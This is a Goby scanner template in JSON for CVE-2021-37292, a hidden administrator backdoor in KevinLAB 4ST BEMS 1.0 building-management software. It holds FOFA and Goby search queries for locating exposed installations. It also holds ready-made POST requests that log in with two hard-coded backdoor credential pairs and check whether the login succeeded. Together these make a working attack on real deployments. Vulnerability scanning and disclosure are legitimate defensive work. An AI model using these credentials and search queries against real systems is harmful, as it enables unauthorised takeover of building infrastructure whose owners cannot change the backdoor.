
{
"Name": "KevinLAB BEMS 1.0 backdoor (CVE-2021-37292)",
"Description": "<p>KevinLAB BEMS has an undocumented backdoor account; these credentials are never exposed to the end user and cannot be changed through any normal operation of the solution via the RMI. An attacker could exploit this vulnerability by logging in with the backdoor account, which holds the highest administrative privileges, and gain full system control. The backdoor user is not visible in the user settings of the admin panel, and it also uses an undocumented privilege level (admin_pk=1) that grants full remote access to every feature the BEMS offers.<br></p>",
"Product": "4ST BEMS 1.0.0",
"Homepage": "http://www.kevinlab.com",
"DisclosureDate": "2022-06-15",
"Author": "twcjw",
"FofaQuery": "body=\"requestUrl = '../http/index.php'\"",
"GobyQuery": "body=\"requestUrl = '../http/index.php'\"",
"Level": "3",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">An attacker could exploit this vulnerability by logging in with the backdoor account, which holds the highest administrative privileges, and gain full system control. The backdoor user is not visible in the user settings of the admin panel, and it also uses an undocumented privilege level (admin_pk=1) that grants full remote access to every feature the BEMS offers.</span><br></p>",
"Recommendation": "<p>none</p>",
"References": [
"https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php"
],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/http/index.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "requester=login&request=login&params=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%5D"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "result",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "true",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/http/index.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "requester=login&request=login&params=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22developer1%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%221234%22%7D%5D"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "result",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "true",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Backdoor"
],
"VulType": [
"Backdoor"
],
"CVEIDs": [
"CVE-2021-37292"
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "KevinLAB BEMS 1.0 后门CVE-2021-37292",
"Product": "4ST L-BEMS 1.0.0",
"Description": "<p>&nbsp;KevinLAB BEMS 包含一个未记录的后门帐户。这些凭据永远不会向最终用户公开，并且不能通过任何正常操作进行修改。攻击者可以通过使用具有最高管理权限的后门账号登录来利用此漏洞，获得完全的系统控制权。在管理面板的用户设置中看不到后门用户，它还使用未记录的权限级别 admin_pk=1，该权限级别允许 BEMS 远程提供的功能完全可用。<br></p>",
"Recommendation": "<p>无</p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">攻击者可以通过使用具有最高管理权限的后门账号登录来利用此漏洞，获得完全的系统控制权。</span><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">在管理面板的用户设置中看不到后门用户，它还使用未记录的权限级别 admin_pk=1，该权限级别允许 BEMS 远程提供的功能完全可用。</span><br></p>",
"VulType": [
"后门"
],
"Tags": [
"后门"
]
},
"EN": {
"Name": "KevinLAB BEMS 1.0 backdoor (CVE-2021-37292)",
"Product": "4ST BEMS 1.0.0",
"Description": "<p>KevinLAB BEMS has an undocumented backdoor account; these credentials are never exposed to the end user and cannot be changed through any normal operation of the solution via the RMI. An attacker could exploit this vulnerability by logging in with the backdoor account, which holds the highest administrative privileges, and gain full system control. The backdoor user is not visible in the user settings of the admin panel, and it also uses an undocumented privilege level (admin_pk=1) that grants full remote access to every feature the BEMS offers.<br></p>",
"Recommendation": "<p>none</p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">An attacker could exploit this vulnerability by logging in with the backdoor account, which holds the highest administrative privileges, and gain full system control. The backdoor user is not visible in the user settings of the admin panel, and it also uses an undocumented privilege level (admin_pk=1) that grants full remote access to every feature the BEMS offers.</span><br></p>",
"VulType": [
"Backdoor"
],
"Tags": [
"Backdoor"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}